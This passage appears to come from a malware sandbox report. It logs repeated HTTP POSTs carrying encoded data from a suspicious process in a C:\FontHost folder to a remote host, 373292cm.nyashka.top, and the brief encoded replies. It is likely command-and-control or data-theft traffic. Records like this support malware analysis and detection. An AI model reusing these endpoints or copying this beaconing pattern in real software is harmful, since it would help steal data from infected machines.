                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:56.476012945 CEST2504OUTData Raw: 5a 56 5c 55 51 40 51 5c 5b 5f 5a 51 59 56 58 57 57 51 5d 53 57 58 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZV\UQ@Q\[_ZQYVXWWQ]SWXS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,#" #>*>?<.?+#??V#<Q?9?Y7=,&F$.Y/!
                              Aug 25, 2024 15:44:56.819982052 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:57.025274992 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[
                              Aug 25, 2024 15:44:57.289798975 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              103192.168.2.55996080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:57.294213057 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:57.647624016 CEST2504OUTData Raw: 5a 50 5c 5f 54 47 54 50 5b 5f 5a 51 59 51 58 51 57 5f 5d 5a 57 5b 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZP\_TGTP[_ZQYQXQW_]ZW[S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8!.$\ 0:)-#<X!^<$#/#W4+*9']4Y8>&F$.Y/=
                              Aug 25, 2024 15:44:57.959919930 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:58.090172052 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              104192.168.2.55996180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:58.211956024 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:58.569530964 CEST2504OUTData Raw: 5f 54 5c 57 54 40 54 58 5b 5f 5a 51 59 54 58 57 57 5d 5d 5e 57 59 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _T\WT@TX[_ZQYTXWW]]^WYS[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-.0/B!>$_ ")?.(-4 ,043<#^4:,&F$.Y/)
                              Aug 25, 2024 15:44:58.882006884 CEST25INHTTP/1.1 100 Continue


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              105192.168.2.55996280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:58.949229002 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:59.309318066 CEST1808OUTData Raw: 5a 57 5c 53 54 42 54 51 5b 5f 5a 51 59 53 58 52 57 5c 5d 5a 57 58 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZW\STBTQ[_ZQYSXRW\]ZWXS_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/U0">#7*=?<=+#X#3#?*970:8>&F$.Y/5
                              Aug 25, 2024 15:44:59.607373953 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:59.730150938 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 11 2a 1c 3e 5d 25 28 2f 0c 30 30 21 0a 2a 3d 09 5b 3d 03 07 5c 27 38 2e 00 25 3e 28 1d 27 05 0f 12 28 10 2e 57 31 2f 2b 13 2e 1e 2b 5d 0c 13 22 5d 34 04 26 58 26 02 01 01 3d 3b 23 15 20 2f 35 02 3c 03 21 51 2b 01 23 01 28 17 2c 03 28 03 2a 56 3b 28 2d 5f 2f 30 3a 55 22 3e 2b 52 0d 11 27 0c 2b 2d 03 10 28 3d 37 5e 36 38 3b 1d 27 3d 00 50 25 0c 2e 54 26 29 24 5d 32 0b 25 55 25 31 2d 12 31 3b 2e 5e 27 3f 0f 12 22 08 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &*>]%(/00!*=[=\'8.%>('(.W1/+.+]"]4&X&=;# /5<!Q+#(,(*V;(-_/0:U">+R'+-(=7^68;'=P%.T&)$]2%U%1-1;.^'?"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              106192.168.2.55996380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:59.139019012 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:59.514998913 CEST2504OUTData Raw: 5a 55 5c 5f 54 44 54 51 5b 5f 5a 51 59 55 58 56 57 5d 5d 5b 57 5e 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZU\_TDTQ[_ZQYUXVW]][W^S_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^,C53"0)*[(Y?+.$#<< ! ('^ V!..&F$.Y/-
                              Aug 25, 2024 15:44:59.811819077 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:59.938560009 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              107192.168.2.55996480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:00.071594954 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:45:00.429095030 CEST2504OUTData Raw: 5f 56 5c 5e 54 46 51 5b 5b 5f 5a 51 59 53 58 53 57 5c 5d 5d 57 5e 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\^TFQ[[_ZQYSXSW\]]W^S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.83!-7 %>0<=]+(4/ "8?:4#01,.&F$.Y/5
                              Aug 25, 2024 15:45:00.748614073 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:00.953639030 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              108192.168.2.55996580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:01.087779045 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:01.444531918 CEST2504OUTData Raw: 5f 56 59 53 54 40 51 5e 5b 5f 5a 51 59 5e 58 53 57 5b 5d 5a 57 59 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _VYST@Q^[_ZQY^XSW[]ZWYSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X,U/E">(] >=<%[?"?(7$R*)3]43"/&F$.Y/
                              Aug 25, 2024 15:45:01.758934975 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:01.890233994 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              109192.168.2.55996680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:02.097172976 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:02.444523096 CEST2504OUTData Raw: 5f 51 5c 5e 54 45 54 5b 5b 5f 5a 51 59 5e 58 51 57 5b 5d 5c 57 5c 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _Q\^TET[[_ZQY^XQW[]\W\S_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,B5>< %[>?.*('\",/W71P(9370%,.&F$.Y/
                              Aug 25, 2024 15:45:02.759957075 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:02.956305027 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              110192.168.2.55996780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:03.103687048 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:03.460359097 CEST2504OUTData Raw: 5f 54 5c 50 54 49 54 51 5b 5f 5a 51 59 55 58 5e 57 5f 5d 53 57 5b 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _T\PTITQ[_ZQYUX^W_]SW[SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/3D5#V5]=/<X><-4#3P#1,Q+47Y.>&F$.Y/-
                              Aug 25, 2024 15:45:03.768834114 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:03.902116060 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              111192.168.2.55996880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:04.029376984 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:04.382008076 CEST2504OUTData Raw: 5f 56 5c 57 51 42 54 58 5b 5f 5a 51 59 56 58 57 57 5d 5d 5a 57 5b 53 58 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _V\WQBTX[_ZQYVXWW]]ZW[SXYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^,#5<\46=?<-6+ <4#,R<9+\7!;&F$.Y/!
                              Aug 25, 2024 15:45:04.712289095 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:04.893264055 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              112192.168.2.55996980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:05.008440018 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:05.366764069 CEST1828OUTData Raw: 5a 52 5c 5e 54 41 51 59 5b 5f 5a 51 59 55 58 5e 57 5d 5d 5d 57 50 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZR\^TAQY[_ZQYUX^W]]]WPSTYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8,"><Y7#9[=+?.>+-7??4!#??X7 _/>&F$.Y/-
                              Aug 25, 2024 15:45:05.673413992 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:05.801935911 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0d 29 25 0c 58 31 15 0a 52 33 30 26 1e 29 13 37 13 3d 04 25 14 25 2b 39 5f 32 00 3c 1e 26 3b 21 12 3f 00 32 14 26 3c 24 00 3a 34 2b 5d 0c 13 22 16 34 04 25 04 25 5a 37 05 2a 5e 37 5f 22 3f 35 02 28 3a 3d 18 3c 3f 3c 1d 2b 07 24 03 28 03 3e 11 2f 01 2a 07 2e 1e 04 50 37 04 2b 52 0d 11 24 54 3c 2e 32 0d 2a 00 15 1a 35 01 33 5b 27 2d 2a 13 25 0b 32 1d 24 5f 20 1f 27 31 35 1c 27 21 3d 1f 31 3b 31 01 25 2f 21 57 36 32 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %)%X1R30&)7=%%+9_2<&;!?2&<$:4+]"4%%Z7*^7_"?5(:=<?<+$(>/*.P7+R$T<.2*53['-*%2$_ '15'!=1;1%/!W62#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              113192.168.2.55997080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:05.053097010 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:05.397761106 CEST2500OUTData Raw: 5f 53 59 55 54 48 51 5d 5b 5f 5a 51 59 57 58 55 57 59 5d 5b 57 5f 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _SYUTHQ][_ZQYWXUWY][W_S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-83"-+ V%)> Y(X9?+[ /4#!Q?9 =X,&F$.Y/-
                              Aug 25, 2024 15:45:05.766819954 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:05.901094913 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              114192.168.2.55997180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:06.025188923 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:45:06.382245064 CEST2504OUTData Raw: 5a 50 5c 55 51 42 51 5e 5b 5f 5a 51 59 5f 58 54 57 5a 5d 53 57 5d 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZP\UQBQ^[_ZQY_XTWZ]SW]SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-8U 6>?#V=)-(%(]#,7 #<7\ 5^8&F$.Y/
                              Aug 25, 2024 15:45:06.696506023 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:06.830126047 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              115192.168.2.55997280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:45:07.202613115 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:45:08.788630962 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:08.788970947 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:08.789200068 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:45:13.602370024 CEST2504OUTData Raw: 5f 5d 5c 53 54 47 51 5b 5b 5f 5a 51 59 53 58 54 57 5c 5d 5e 57 51 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]\STGQ[[_ZQYSXTW\]^WQSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;6.<\#\).(X>>*<?"<7W3+9 73%]8&F$.Y/5
